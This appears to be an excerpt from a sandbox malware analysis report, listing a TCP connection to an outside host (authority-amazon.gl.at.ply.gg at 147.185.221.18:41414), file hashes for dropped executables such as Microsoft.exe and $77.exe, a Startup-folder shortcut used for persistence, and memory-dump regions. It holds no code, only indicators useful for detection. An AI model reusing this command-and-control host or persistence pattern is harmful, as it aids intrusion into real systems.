| US | 147.185.221.18:41414 | authority-amazon.gl.at.ply.gg | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f53207a5ca2ef5c7e976cbb3cb26d870 |
| SHA1 | 49a8cc44f53da77bb3dfb36fc7676ed54675db43 |
| SHA256 | 19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23 |
| SHA512 | be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499 |
\??\pipe\LOCAL\crashpad_1460_EGGUVVXZFHGSRYRP
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ae54e9db2e89f2c54da8cc0bfcbd26bd |
| SHA1 | a88af6c673609ecbc51a1a60dfbc8577830d2b5d |
| SHA256 | 5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af |
| SHA512 | e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 52208df084964b3f3f096b1d0b7124aa |
| SHA1 | 7974ee7a887e3e2fdb4969a5a31b2f2df12bb32a |
| SHA256 | bf6944d5f848a9acd90feacf9ff298ff5c2c1c21e454b6abcc99770f34edc16a |
| SHA512 | 618532b87efb60b4cbcd9b82b4316c71ce4332c97c2bae5ab5c9a47e421b6d89729d213582457a6ae0ab63f4f2bf7c6fb659943442f0ce45afc347c856fb6586 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Downloads\Unconfirmed 956282.crdownload
| MD5 | 5273c9f0a68605f043bacdf7a81faecf |
| SHA1 | ca9028398da6f88dafa157bf6b126e2bc8e48f13 |
| SHA256 | 06527a5d56ce163825bd94e07de31b8bc4e97c44dc006f060c63062fec2db168 |
| SHA512 | de4799845318d4f8902b1f1cdfb780382bd796b122acd975eaa7cfad971dba9628c3a7f5403455c5ca4f72cfe8cfbbbde3a68ab8e567f0349ffe9a2c4ff706bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 863ef0a62d09744f34e64f809023b982 |
| SHA1 | f34315d2e719d63f8abdacd93ac0e66be5f575e3 |
| SHA256 | f8979dcd6314cb31589d84c58b665facd6c83a1793bc7d9c68a606bcacd32689 |
| SHA512 | 3a74d7fb1f4e9512c772e67419bf0f433ba1149c1194fa65e40615ef210bebc7b95e01b7de8c79ae3c2529d3ec06de1542fa98562d7f43b75ea2f3e1db1d1c21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0411ad16bea649847357850fd470a9ec |
| SHA1 | 475dc19f67d047fd8e344cbe31c7b1f995b5c5ca |
| SHA256 | 83d55d906d5866995727fac7313c1c21846df83dfc7b72e11ec6d545431972da |
| SHA512 | 90422adf5729c313123b493447219aa3a552f6f7fb3b2b7fae10f168a461b8f64ffc16f067ad283b57cf79e8496c51bef43ccb42bb41202ab7728f39903cdf3c |
memory/5164-93-0x000001B984B50000-0x000001B984B72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t0ret4sz.5ub.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | eac98e72b261990fa9e900e1d6da3837 |
| SHA1 | 8b98be67638235c7fc28038773e8330fe8fb6d88 |
| SHA256 | 5edf511f2d0cbb631361fae9d202c728e1ee0c610e28098e145b97b75efaccb4 |
| SHA512 | b92814882e12be90395ffe51440e343c8bcc2f9b4600bc5ef7e8c12ffb88f973275d1a4f28f53e57f3abc19a48277d003d9002e9fa220a55a808aa394fa7ee78 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 14de68d7a317ad644b6ef887e0182491 |
| SHA1 | 1ff476a6c3fb9b006e873ba2482865cb9c6caed5 |
| SHA256 | bdf1006cd8b92cb88266fa7337f4473dfa40ee27f1ab0e3addab539ad3446783 |
| SHA512 | 9162b366ed2f17a20456938d3df16c9b7c79c9ff6b063a2cf344807138fc5fba41e9f8c7bc209634cf2ab8464b66c25c3480cd695a0936ce17eb840375831562 |
memory/5388-121-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-122-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-123-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-127-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-133-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-132-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-131-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-130-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-129-0x000002678E830000-0x000002678E831000-memory.dmp
memory/5388-128-0x000002678E830000-0x000002678E831000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Users\Admin\AppData\Local\Temp\Microsoft.exe
| MD5 | 19aff7e3b7e3bce2bc35e60f72df0e85 |
| SHA1 | cf81454aa5cd0aad035275e64a71bf45b7cb261a |
| SHA256 | f0c875a630f2633efb93d5a66437c6f4894f2da6d5c7ec352115d686a199ce07 |
| SHA512 | 49b44e20099682b471ae0478c5db73d5b2e76aa1984b30fb95f7590cd636fcbe6dc4b41063882997dcd891ad96936cde56688783a92b07bbe637b6713f56eda0 |
memory/5844-157-0x00000000008B0000-0x00000000008E4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$77.exe
| MD5 | 6010709a7e1c771b74dbc2602af399f5 |
| SHA1 | b417a1d746ddfa7fe039a01bf6b87de60da335cc |
| SHA256 | 4352b9094b17df14a12af21dacc67d4b7661ca03f4b1492e847833ff3d77e4b5 |
| SHA512 | 26538ee5351ca5242b9bbb2bfc6cae661bb2e5c52204109d3cd880505ea618bb8bf248e8b15518ee499bc0c0e87a054ea97c78217b1e91a86c2e2c7348a28d1d |
memory/5968-171-0x0000000000DE0000-0x0000000000DF0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 48f8b55d9610e3971015e6a2a586f2c5 |
| SHA1 | e33a511543f2a85d6076a84dedabf6fc5c9cf89d |
| SHA256 | fff1a83296dc31250f3e9c54b614c6f85fc44f3effc684173b826eb1b667c2dd |
| SHA512 | 5d9b1debeb1260738bb535d85eb7d4321a418b58e36ff658b3dcad564d6b6d8e1bc986efe024c01db8240e012a892627c3a976ecee15fb0d50418a9afa9730f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 316b8ffe7e5dc6add3a2b036e112e675 |
| SHA1 | 9351953aeb5cb6b82600d45e465872dd60dd2d5c |
| SHA256 | 4e419a44acbcda32a59b7b090e6a2e357a84cb78f1fa1f1be79a2ac4245d50ac |
| SHA512 | 5fcbe58eea16e157f0d2595a2304e249cb7a3aab5516d58600ef828bb36766d5a149554fbe41ab0bc09df89da9be8538a490599ce02e23ff845053af78bebe4d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Microsoft.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a115771c01b1507a1846f0dc6687a492 |
| SHA1 | c6dd34f87bd8fe6c4af77e9fa02e7b1cf58bd41f |
| SHA256 | a3409692b7dfa70b0f083a5d73230eaaaf55c7c3e74ec5399c5b3f09e05219a5 |
| SHA512 | 1bc6d51f48aa4e4013378887aa9e0bb91b30e5618bae6c15c45526ba861971c749a0778291d3f5515bfd75626c573d0f3c0110501166e60df176af2fcc89698c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bedb5025bf1eff6f585b07d364e6fdf3 |
| SHA1 | 14f8df0938b32838135a78f6160577f02475eef1 |
| SHA256 | 642b0c6cc8ab92c8e2769bed0859a8f80b242f0a7b5c1be7fd53424fd56c2d5b |
| SHA512 | 2111544b7f99f12b14547837ebb4f00ec968daa1153a5077de130c849aba63b53e8d23918690b944fec2958ca33a479f306dbac7b9b01b5c6a9c8a3903cccd4a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dd1d0b083fedf44b482a028fb70b96e8 |
| SHA1 | dc9c027937c9f6d52268a1504cbae42a39c8d36a |
| SHA256 | cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c |
| SHA512 | 96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2c8179aaa149c0b9791b73ce44c04d1 |
| SHA1 | 703361b0d43ec7f669304e7c0ffbbfdeb1e484ff |
| SHA256 | c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a |
| SHA512 | 2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk
| MD5 | 7b9c5c3e28db7ebdd3fc80ea9c93be9e |
| SHA1 | bc06ac54e9f5dcb16702ff3c595ce253a5dbe450 |
| SHA256 | 24d2b087f342f2edfffbecedc430623dd78eaef083536448151d88a8a65f7366 |
| SHA512 | 70027ab7e28dfea808ac46e94a5b6b3cb00b0f0e06236d45e013db00dd8e779747a3d30b6bb7136077f8b04737b421459b4eaee5e1a608d457d076fcff8824f9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | afc6cddd7e64d81e52b729d09f227107 |
| SHA1 | ad0d3740f4b66de83db8862911c07dc91928d2f6 |
| SHA256 | b5e81a7c7d80feaaa10ee7bc8aaef9f21a5c1e4b03b3823ed115022311d674a0 |
| SHA512 | 844edb69585153c378a7c97709983776fc9303a32fb5ef8122ecca32adfc0b265f5ef7118ee07814da5c020ac7ba1bf2a2f66d46312e4d8e6df99aab2e5f9b2a |